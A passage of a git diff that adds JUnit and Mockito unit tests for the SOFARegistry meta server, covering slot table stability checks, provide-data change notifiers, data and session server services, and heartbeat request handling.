+ } + + @Test + public void testUpdateSlotTableWhenFollowerChangeOnly() { + Assert.assertFalse(slotTableStats.isSlotFollowersStable()); + List slotStatuses = Lists.newArrayList(); + for (DataNode node : dataNodes) { + slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotManager.getDataNodeManagedSlot(node.getIp(), false); + for (int slotId : dataNodeSlot.getFollowers()) { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotManager.getSlotTable().getSlot(slotId).getLeaderEpoch(), + node.getIp(), + System.currentTimeMillis(), + System.currentTimeMillis() - 1000)); + } + slotTableStats.checkSlotStatuses(node, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotFollowersStable()); + + SlotTable prev = slotManager.getSlotTable(); + Map slotMap = prev.getSlotMap(); + Slot prevSlot = slotMap.get(1); + Set followers = Sets.newHashSet(prevSlot.getFollowers()); + List newFollowers = NodeUtils.transferNodeToIpList(dataNodes); + newFollowers.removeAll(followers); + slotMap.put(1, new Slot(1, prevSlot.getLeader(), prevSlot.getLeaderEpoch(), newFollowers)); + SlotTable slotTable = new SlotTable(prev.getEpoch() + 1, slotMap.values()); + slotManager.refresh(slotTable); + + SlotStats prevSlotStats = slotTableStats.getSlotStats(1); + slotTableStats.updateSlotTable(slotTable); + Assert.assertFalse(slotTableStats.isSlotFollowersStable()); + SlotStats curSlotStats = slotTableStats.getSlotStats(1); + Assert.assertNotEquals(prevSlotStats, curSlotStats); + } + + @Test + public void testStableResultNotImpactByStableData() { + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + // now, we add some stable data, that data-server is reporting slots it does not contains + DataNode dataNode1 = dataNodes.get(0); + DataNode dataNode2 = dataNodes.get(1); + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode1.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode2.getIp(), + BaseSlotStatus.LeaderStatus.UNHEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode2, slotStatuses); + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + } + + @Test + public void testSlotTableUpdateFollowerStableData() { + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + // now, we add some stable data, that data-server is reporting slots it does not contains + DataNode dataNode1 = dataNodes.get(0); + DataNode dataNode2 = dataNodes.get(1); + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode1.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode2.getIp(), + System.currentTimeMillis(), + -1L)); + }); + slotTableStats.checkSlotStatuses(dataNode2, slotStatuses); + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + } + + @Test + public void testSlotNotEquals() { + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + slotManager.refresh( + new SlotTableGenerator(dataNodes).setNextLeader(1).setNextFollower(2).createSlotTable()); + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataNotifierTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataNotifierTest.java new file mode 100644 index 000000000..6bcd1c113 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataNotifierTest.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.provide.data; + +import static org.mockito.Matchers.any; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.server.meta.remoting.data.DefaultDataServerService; +import com.alipay.sofa.registry.server.meta.remoting.session.DefaultSessionServerService; +import com.google.common.collect.Sets; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class DefaultProvideDataNotifierTest { + + private DefaultProvideDataNotifier notifier = new DefaultProvideDataNotifier(); + + @Mock private DefaultDataServerService defaultDataServerService; + + @Mock private DefaultSessionServerService defaultSessionServerService; + + @Before + public void beforeDefaultProvideDataNotifierTest() { + MockitoAnnotations.initMocks(this); + notifier + .setDataServerProvideDataNotifier(defaultDataServerService) + .setSessionServerProvideDataNotifier(defaultSessionServerService); + } + + @Test + public void testNotifyProvideDataChange() { + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent( + "message", System.currentTimeMillis(), Sets.newHashSet(Node.NodeType.DATA))); + verify(defaultDataServerService, times(1)).notifyProvideDataChange(any()); + verify(defaultSessionServerService, never()).notifyProvideDataChange(any()); + + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent( + "message", System.currentTimeMillis(), Sets.newHashSet(Node.NodeType.SESSION))); + verify(defaultDataServerService, times(1)).notifyProvideDataChange(any()); + verify(defaultSessionServerService, times(1)).notifyProvideDataChange(any()); + + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent( + "message", + System.currentTimeMillis(), + Sets.newHashSet(Node.NodeType.SESSION, Node.NodeType.DATA))); + verify(defaultDataServerService, times(2)).notifyProvideDataChange(any()); + verify(defaultSessionServerService, times(2)).notifyProvideDataChange(any()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/data/DefaultDataServerServiceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/data/DefaultDataServerServiceTest.java new file mode 100644 index 000000000..d0662e53a --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/data/DefaultDataServerServiceTest.java @@ -0,0 +1,216 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.data; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.meta.remoting.connection.DataConnectionManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.net.InetSocketAddress; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; +import org.mockito.invocation.InvocationOnMock; +import org.mockito.stubbing.Answer; + +public class DefaultDataServerServiceTest extends AbstractMetaServerTestBase { + + private DefaultDataServerService notifier = new DefaultDataServerService(); + + @Mock private DataServerManager dataServerManager; + + @Mock private DataNodeExchanger dataNodeExchanger; + + @Mock private DataConnectionManager dataConnectionManager; + + @Before + public void beforeDataServerProvideDataNotifierTest() { + MockitoAnnotations.initMocks(this); + notifier + .setDataConnectionManager(dataConnectionManager) + .setDataNodeExchanger(dataNodeExchanger) + .setDataServerManager(dataServerManager); + } + + @Test + public void testNotify() throws RequestException { + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + verify(dataServerManager, never()).getDataServerMetaInfo(); + verify(dataNodeExchanger, never()).request(any(Request.class)); + } + + @Test + public void testNotifyWithNoDataNodes() throws RequestException { + when(dataConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(randomIp(), Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), Math.abs(random.nextInt(65535)) % 65535))); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), Lists.newArrayList())); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + verify(dataServerManager, times(1)).getDataServerMetaInfo(); + verify(dataNodeExchanger, never()).request(any(Request.class)); + } + + @Test + public void testNotifyNoMatchingDataNodesWithConnect() throws RequestException { + when(dataConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(randomIp(), Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), Math.abs(random.nextInt(65535)) % 65535))); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), randomDataNodes(3))); + when(dataNodeExchanger.request(any(Request.class))) + .thenReturn( + () -> { + return null; + }); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + verify(dataNodeExchanger, never()).request(any(Request.class)); + } + + @Test + public void testNotifyNormal() throws RequestException, InterruptedException { + String ip1 = randomIp(), ip2 = randomIp(); + when(dataConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(ip1, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(ip2, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), 1024))); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new DataNode(randomURL(ip1), getDc()), + new DataNode(randomURL(ip2), getDc()), + new DataNode(randomURL(randomIp()), getDc())))); + when(dataNodeExchanger.request(any(Request.class))) + .thenReturn( + () -> { + return null; + }); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + Thread.sleep(50); + verify(dataNodeExchanger, times(2)).request(any(Request.class)); + } + + @Test + public void testExpectedException() { + notifier.setDataConnectionManager(new DataConnectionManager()); + notifier.getNodeConnectManager(); + } + + @Test + public void testBoltRequest() throws RequestException, InterruptedException { + String ip1 = randomIp(), ip2 = randomIp(); + Client rpcClient = spy(getRpcClient(scheduled, 10, new TimeoutException("expected"))); + when(dataNodeExchanger.request(any(Request.class))) + .then( + new Answer() { + @Override + public Object answer(InvocationOnMock invocationOnMock) throws Throwable { + Request request = invocationOnMock.getArgumentAt(0, Request.class); + rpcClient.sendCallback( + request.getRequestUrl(), + request.getRequestBody(), + request.getCallBackHandler(), + 100); + return null; + } + }); + notifier.setDataNodeExchanger(dataNodeExchanger); + when(dataConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(ip1, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(ip2, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), 1024))); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new DataNode(randomURL(ip1), getDc()), + new DataNode(randomURL(ip2), getDc()), + new DataNode(randomURL(randomIp()), getDc())))); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + Thread.sleep(100); + verify(rpcClient, atLeast(1)).sendCallback(any(), any(), any(), anyInt()); + } + + @Test + public void testBoltResponsePositive() throws InterruptedException, RequestException { + String ip1 = randomIp(), ip2 = randomIp(); + when(dataConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(ip1, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(ip2, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), 1024))); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new DataNode(randomURL(ip1), getDc()), + new DataNode(randomURL(ip2), getDc()), + new DataNode(randomURL(randomIp()), getDc())))); + Client client2 = spy(getRpcClient(scheduled, 10, "Response")); + DataNodeExchanger otherNodeExchanger = mock(DataNodeExchanger.class); + when(otherNodeExchanger.request(any(Request.class))) + .then( + new Answer() { + @Override + public Object answer(InvocationOnMock invocationOnMock) throws Throwable { + Request request = invocationOnMock.getArgumentAt(0, Request.class); + logger.warn("[testBoltResponsePositive]"); + client2.sendCallback( + request.getRequestUrl(), + request.getRequestBody(), + request.getCallBackHandler(), + 10000); + return null; + } + }); + notifier.setDataNodeExchanger(otherNodeExchanger); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + Thread.sleep(200); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/handler/HeartbeatRequestHandlerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/handler/HeartbeatRequestHandlerTest.java new file mode 100644 index 000000000..e737fe67b --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/handler/HeartbeatRequestHandlerTest.java @@ -0,0 +1,143 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.metaserver.impl.DefaultCurrentDcMetaServer; +import com.alipay.sofa.registry.server.meta.slot.manager.DefaultSlotManager; +import java.util.concurrent.TimeoutException; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class HeartbeatRequestHandlerTest extends AbstractMetaServerTestBase { + + private HeartbeatRequestHandler handler = new HeartbeatRequestHandler(); + + @Mock private Channel channel; + + @Mock private DefaultCurrentDcMetaServer currentDcMetaServer; + + @Mock private SessionServerManager sessionServerManager; + + @Mock private DataServerManager dataServerManager; + + @Mock private MetaLeaderService metaLeaderService; + + private DefaultSlotManager slotManager; + + @Before + public void beforeHeartbeatRequestHandlerTest() { + MockitoAnnotations.initMocks(this); + NodeConfig nodeConfig = mock(NodeConfig.class); + handler.setNodeConfig(nodeConfig); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + when(metaLeaderService.amILeader()).thenReturn(true); + slotManager = new DefaultSlotManager(metaLeaderService); + handler.setCurrentDcMetaServer(currentDcMetaServer).setMetaLeaderElector(metaLeaderService); + when(currentDcMetaServer.getDataServerManager()).thenReturn(dataServerManager); + when(currentDcMetaServer.getSessionServerManager()).thenReturn(sessionServerManager); + when(currentDcMetaServer.getSlotTable()).thenReturn(slotManager.getSlotTable()); + } + + @Test + public void testDoHandle() throws TimeoutException, InterruptedException { + makeMetaLeader(); + slotManager.refresh(randomSlotTable(randomDataNodes(3))); + HeartbeatRequest heartbeat = + new HeartbeatRequest<>( + new DataNode(randomURL(randomIp()), getDc()), + 0, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC)); + Assert.assertTrue(((GenericResponse) handler.doHandle(channel, heartbeat)).isSuccess()); + } + + @Test + public void testDoHandleWithErrDC() throws TimeoutException, InterruptedException { + makeMetaLeader(); + slotManager.refresh(randomSlotTable(randomDataNodes(3))); + HeartbeatRequest heartbeat = + new HeartbeatRequest<>( + new DataNode(randomURL(randomIp()), getDc()), + 0, + "ERROR_DC", + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC)); + handler.doHandle(channel, heartbeat); + verify(channel, times(1)).close(); + } + + @Test + public void testDoHandleWithErrSlotConfig() throws TimeoutException, InterruptedException { + makeMetaLeader(); + slotManager.refresh(randomSlotTable(randomDataNodes(3))); + HeartbeatRequest heartbeat = + new HeartbeatRequest<>( + new DataNode(randomURL(randomIp()), getDc()), + 0, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM - 1, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC)); + handler.doHandle(channel, heartbeat); + verify(channel, times(1)).close(); + + heartbeat = + new HeartbeatRequest<>( + new DataNode(randomURL(randomIp()), getDc()), + 0, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS - 1, SlotConfig.FUNC)); + handler.doHandle(channel, heartbeat); + verify(channel, times(2)).close(); + + heartbeat = + new HeartbeatRequest<>( + new DataNode(randomURL(randomIp()), getDc()), + 0, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo(SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, "unknown")); + handler.doHandle(channel, heartbeat); + verify(channel, times(3)).close(); + } + + @Test + public void testInterest() { + Assert.assertEquals(HeartbeatRequest.class, handler.interest()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/notifier/AbstractNotifierTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/notifier/AbstractNotifierTest.java new file mode 100644 index 000000000..61a03e083 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/notifier/AbstractNotifierTest.java @@ -0,0 +1,81 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.notifier; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; +import java.net.InetSocketAddress; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class AbstractNotifierTest extends AbstractMetaServerTestBase { + + @Mock private NodeExchanger exchanger; + + private AbstractNotifier notifier; + + @Mock private NodeConnectManager nodeConnectManager; + + @Before + public void beforeAbstractNotifierTest() { + MockitoAnnotations.initMocks(this); + List nodes = randomDataNodes(2); + when(nodeConnectManager.getConnections(any())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(nodes.get(0).getIp(), 8080), + new InetSocketAddress(nodes.get(1).getIp(), 8080))); + notifier = + new AbstractNotifier() { + @Override + protected NodeExchanger getNodeExchanger() { + return exchanger; + } + + @Override + protected List getNodes() { + return nodes; + } + + @Override + protected NodeConnectManager getNodeConnectManager() { + return nodeConnectManager; + } + }; + notifier.setMetaLeaderService(metaLeaderService); + } + + @Test + public void testNotifySlotTableChange() throws InterruptedException, TimeoutException { + makeMetaNonLeader(); + notifier.notifySlotTableChange(randomSlotTable()); + verify(exchanger, never()).request(any()); + makeMetaLeader(); + notifier.notifySlotTableChange(randomSlotTable()); + Thread.sleep(100); + verify(exchanger, atLeast(1)).request(any()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/session/DefaultSessionServerServiceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/session/DefaultSessionServerServiceTest.java new file mode 100644 index 000000000..a3ca84c3b --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/remoting/session/DefaultSessionServerServiceTest.java @@ -0,0 +1,142 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.session; + +import static org.mockito.Matchers.*; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.meta.remoting.connection.SessionConnectionManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.net.InetSocketAddress; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; +import org.mockito.invocation.InvocationOnMock; +import org.mockito.stubbing.Answer; + +public class DefaultSessionServerServiceTest extends AbstractMetaServerTestBase { + + private DefaultSessionServerService notifier = new DefaultSessionServerService(); + + @Mock private SessionNodeExchanger sessionNodeExchanger; + + @Mock private SessionConnectionManager sessionConnectionManager; + + @Mock private SessionServerManager sessionServerManager; + + @Before + public void beforeSessionServerProvideDataNotifierTest() { + MockitoAnnotations.initMocks(this); + notifier + .setSessionConnectionHandler(sessionConnectionManager) + .setSessionNodeExchanger(sessionNodeExchanger) + .setSessionServerManager(sessionServerManager); + } + + @Test + public void testBoltRequest() throws RequestException, InterruptedException { + String ip1 = randomIp(), ip2 = randomIp(); + Client rpcClient = spy(getRpcClient(scheduled, 10, new TimeoutException("expected"))); + when(sessionNodeExchanger.request(any(Request.class))) + .then( + new Answer() { + @Override + public Object answer(InvocationOnMock invocationOnMock) throws Throwable { + Request request = invocationOnMock.getArgumentAt(0, Request.class); + rpcClient.sendCallback( + request.getRequestUrl(), + request.getRequestBody(), + request.getCallBackHandler(), + 100); + return null; + } + }); + notifier.setSessionNodeExchanger(sessionNodeExchanger); + when(sessionConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(ip1, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(ip2, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), 1024))); + when(sessionServerManager.getSessionServerMetaInfo()) + .thenReturn( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new SessionNode(randomURL(ip1), getDc(), ServerEnv.PROCESS_ID), + new SessionNode(randomURL(ip2), getDc(), ServerEnv.PROCESS_ID), + new SessionNode(randomURL(randomIp()), getDc(), ServerEnv.PROCESS_ID)))); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + Thread.sleep(100); + verify(rpcClient, atLeast(1)).sendCallback(any(), any(), any(), anyInt()); + } + + @Test + public void testBoltResponsePositive() throws InterruptedException, RequestException { + String ip1 = randomIp(), ip2 = randomIp(); + when(sessionConnectionManager.getConnections(anyString())) + .thenReturn( + Lists.newArrayList( + new InetSocketAddress(ip1, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(ip2, Math.abs(random.nextInt(65535)) % 65535), + new InetSocketAddress(randomIp(), 1024))); + when(sessionServerManager.getSessionServerMetaInfo()) + .thenReturn( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new SessionNode(randomURL(ip1), getDc(), ServerEnv.PROCESS_ID), + new SessionNode(randomURL(ip2), getDc(), ServerEnv.PROCESS_ID), + new SessionNode(randomURL(randomIp()), getDc(), ServerEnv.PROCESS_ID)))); + Client client2 = spy(getRpcClient(scheduled, 10, "Response")); + SessionNodeExchanger otherNodeExchanger = mock(SessionNodeExchanger.class); + when(otherNodeExchanger.request(any(Request.class))) + .then( + new Answer() { + @Override + public Object answer(InvocationOnMock invocationOnMock) throws Throwable { + Request request = invocationOnMock.getArgumentAt(0, Request.class); + logger.warn("[testBoltResponsePositive]"); + client2.sendCallback( + request.getRequestUrl(), + request.getRequestBody(), + request.getCallBackHandler(), + 10000); + return null; + } + }); + notifier.setSessionNodeExchanger(otherNodeExchanger); + notifier.notifyProvideDataChange( + new ProvideDataChangeEvent(ValueConstants.BLACK_LIST_DATA_ID, System.currentTimeMillis())); + Thread.sleep(200); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/BlacklistDataResourceTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/BlacklistDataResourceTest.java new file mode 100644 index 000000000..1d049e445 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/BlacklistDataResourceTest.java @@ -0,0 +1,53 @@ +/* + * Licensed to the 